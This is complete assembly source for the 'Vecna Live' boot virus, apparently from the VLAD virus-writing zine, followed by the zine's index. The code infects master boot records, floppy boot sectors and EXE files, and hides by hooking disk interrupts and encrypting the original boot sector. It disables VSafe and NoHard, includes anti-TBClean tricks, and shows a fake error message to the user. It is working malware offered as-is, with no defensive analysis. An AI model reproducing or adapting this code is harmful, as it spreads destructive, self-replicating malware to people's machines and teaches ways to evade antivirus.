Virus Labs & Distribution
VLAD #7 - Vecna Boot Virus 

;  " Seldom is the name Vecna spoken, and even then only in the most hushed
;    and terrified tones, for legends say the shade of this most supreme 
;    of all liches still roams the world."
;
; [Vecna Live] by Vecna
;
; Resident Boot/MBR/EXE infector
; Advanced Stealth
; Encrypt Boot/MBR
; Retro functions
; Does other stuff

.model  tiny
.code
org     0

MARK = 'V ' XOR 05555h

Start:  cli
	jmp     short begin

bootif: db      1fh dup (?)                             ; Old BPB

begin:  cmp     cs:[0], 20cdh                           ; Check PSP
	jnz     InBoot

InCom:  sti                                             ; TBClean active?
	push    word ptr [loco+100h]                    ; Debug active?
	mov     byte ptr [loco+100h+1], 0h              ; Pentium?
loco:   jmp     short conti                             ; No, continue
	mov     si, offset Msg2+100h
	mov     cx, EndMsg2-Msg2
	mov     byte ptr[_ret+100h], 0c3h
	xor     ax, ax
	db      2eh
	int     10h
	call    Decrypt                                 ; Print warning
twast:  loop    twast                                   ; Wast time

conti:  pop     word ptr [loco+100h]                    ; Restore
	mov     byte ptr[_ret+100h], 2eh
	mov     ah, 0ffh                                ; Uninstall NoHard
	xor     bl, bl
	db      2eh                                     ; Anti-TBClean
	int     13h
	mov     ax, 0fa02h                              ; Uninstall VSafe
	mov     dx, 5945h
	int     16h
	mov     ah, 019h                                ; Res check
	int     13h
	cmp     ah, 0f0h
	je      GoOut
	mov     ax, 0201h                               ; Read MBR
	mov     bx, offset EndVir+100h
	mov     cl, 01h
	push    cx
	mov     dx, 0080h
	int     13h
	cmp     word ptr es:[bx+offset marker],MARK     ; Is infected?
	je      GoOut
	call    EncDec                                  ; Encrypt MBR
	mov     ax, 0301h
	push    ax
	mov     cl, 05h
	int     13h                                     ; Write to sector 5
	pop     ax
	pop     cx
	mov     bx, 0100h
	int     13h                                     ; Write virus
GoOut:  mov     si, offset Msg+100h
	mov     cx, EndMsg-Msg                          ; Print fake msg

Decrypt:lodsb
	xor     al, 055h
	db      2eh                                     ; Anti-TBClean
	int     29h
	loop    Decrypt
	mov     ah, 4ch
_ret:   db      2eh                                     ; Anti-TBClean
	int     21h

InBoot: mov     si,7c00h
	xor     ax,ax
	mov     es,ax
	mov     cl,6
	mov     ss,ax                                   ; Setup stack
	mov     sp,si
	sti
	mov     ds,ax
	dec     word ptr ds:[413h]                      ; Steal 1024 bytes
	int     12h
	shl     ax,cl
	xor     di,di
	mov     cx,100h
	mov     es,ax
	rep     movsw                                   ; Copy to high mem
	mov     ax,word ptr ds:[13h*4]
	mov     word ptr es:[offset i13],ax
	mov     ax,word ptr ds:[13h*4+2]
	mov     word ptr es:[offset i13+2],ax
	mov     word ptr ds:[13h*4],offset handler     ; Hook int 13h
	mov     word ptr ds:[13h*4+2],es
	int     19h                                    ; Reboot

Stealth:mov     cx,5                                   ; Show sector 5
	mov     ax,201h
	cmp     dl,80h
	jae     st_hd
	mov     cl,14                                  ; Or sector 14 head 1
	mov     dh,1                                   ; in floppies
st_hd:  call    int13h
	call    EncDec                                 ; Decrypt
	jmp     short pop_exit

Handler:cmp     ah, 019h                               ; Res check?
	je      ResTest
	cmp     ah,2                                   ; Reading?
	jb      OtherStealth
	cmp     ah,3                                   ; Writing?
	ja      OtherStealth
	cmp     cx,1                                   ; In boot sector?
	jne     OtherStealth
	cmp     dh,0
	jne     OtherStealth
	call    int13h
	jnc     GoInf                                  ; Try infect
	jmp     a13h
ResTest:mov     ah, 0f0h
	iret

GoInf:  pushf
	push    ax
	push    bx
	push    cx
	push    dx
	push    si
	push    di
	push    es
	push    ds
	cmp     word ptr es:[bx + offset marker],MARK  ; Already infect
	je      stealth
	cmp     dl,80h
	jb      inf_fl
	mov     cx,5
	xor     dh,dh
	jmp     short write_v
Inf_fl: mov     cl,14
	mov     dh,1
Write_V:call    EncDec
	mov     ax,301h
	call    int13h                                 ; Write encrypted Boot
	call    EncDec
	jc      pop_exit
	push    es
	pop     ds
	push    cs
	pop     es
	mov     si, bx
	add     si, 3
	mov     di, offset bootif
	mov     cx, 1fh
	rep     movsb                                  ; Copy BPB
	push    cs
	push    cs
	pop     es
	pop     ds
	xor     bx, bx
	mov     ax,301h
	mov     cx,1
	xor     dh,dh
	call    int13h

Pop_Exit:pop     ds
	pop     es
	pop     di
	pop     si
	pop     dx
	pop     cx
	pop     bx
	pop     ax
	popf
	retf    2

OtherStealth:
	cmp     cx,5                                   ; In sector 5?
	jne     IsExe
	cmp     dh,0                                   ; In head 0?
	jne     IsExe
	cmp     dl,80h                                 ; In hd?
	jb      IsExe
	mov     cx, 0bh                                ; To sector 11
	jmp     short a13h

IsExe:  cmp     ah, 03h
	jne     a13h                                   ; Writing?
	push    ax
	mov     ax, word ptr es:[bx]
	add     al, ah
	cmp     al, 167                                ; EXE file?
	pop     ax
	jne     a13h
	cmp     word ptr es:[bx+4], 080h               ; Big enough?
	jbe     a13h
	cmp     dl,80h                                 ; In floppy?
	jae     a13h
	push    ds
	push    cx
	push    di
	push    si
	push    cs
	pop     ds
	xor     si, si
	mov     di, bx
	mov     cx, 200h
	rep     movsb                                  ; Overwrite with
	pop     si                                     ; virus code
	pop     di
	pop     cx
	pop     ds

a13h:   db      0eah
	i13     dd 0

Int13h: pushf
	call    dword ptr cs:[i13]
	ret

EncDec: push   bx                                       ; Encrypt/Decrypt boot
	push   cx
	mov    cx, 200h
EncLoop:xor    byte ptr es:[bx], cl
	inc    bx
	loop   EncLoop
	pop    cx
	pop    bx
	ret

Msg     db      'O' XOR 055h                            ; Fake message
	db      'u' XOR 055h
	db      't' XOR 055h
	db      ' ' XOR 055h
	db      'o' XOR 055h
	db      'f' XOR 055h
	db      ' ' XOR 055h
	db      'm' XOR 055h
	db      'e' XOR 055h
	db      'm' XOR 055h
	db      'o' XOR 055h
	db      'r' XOR 055h
	db      'y' XOR 055h
	db      '.' XOR 055h
	db      10  XOR 055h
	db      13  XOR 055h
endmsg:

Marker:

msg2:   db      ' ' XOR 055h                            ; Warning...
	db      'V' XOR 055h
	db      'e' XOR 055h
	db      'c' XOR 055h
	db      'n' XOR 055h
	db      'a' XOR 055h
	db      ' ' XOR 055h
	db      'L' XOR 055h
	db      'i' XOR 055h
	db      'v' XOR 055h
	db      'e' XOR 055h
	db      ' ' XOR 055h
	db      '.' XOR 055h
	db      '.' XOR 055h
	db      '.' XOR 055h
	db      10  XOR 055h
	db      13  XOR 055h
	db      07  XOR 055h
endmsg2:

org     510
	db      055h,0aah                               ; Valid MBR

EndVir:

end
- VLAD #7 INDEX -

ARTICLE.1_1      
Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      
No Flags
ARTICLE.2_2       Goodbye Virus
ARTICLE.2_3       Boot Sector Tutorial
ARTICLE.2_4       STAOG Linux Virus
ARTICLE.2_5       Pow Boot Virus
ARTICLE.2_6       Wulf2
ARTICLE.2_7       Tbscan Internals

ARTICLE.3_1      
VLAD Viruses
ARTICLE.3_2       TVIR600
ARTICLE.3_3       Vecna Boot Virus
ARTICLE.3_4       Padania Virus
ARTICLE.3_5       HooDoo Virus
ARTICLE.3_6       Pandemonium Virus
ARTICLE.3_7       Black Lotus

ARTICLE.4_1      
Zip Virus
ARTICLE.4_2       Archive Infect
ARTICLE.4_3       Virstop Article
ARTICLE.4_4       Boza Makes Bontchev Barf Virus
ARTICLE.4_5       Killer Virus
ARTICLE.4_6       Muraroa End
ARTICLE.4_7       Mages Fury

About VLAD - Links - Contact Us - Main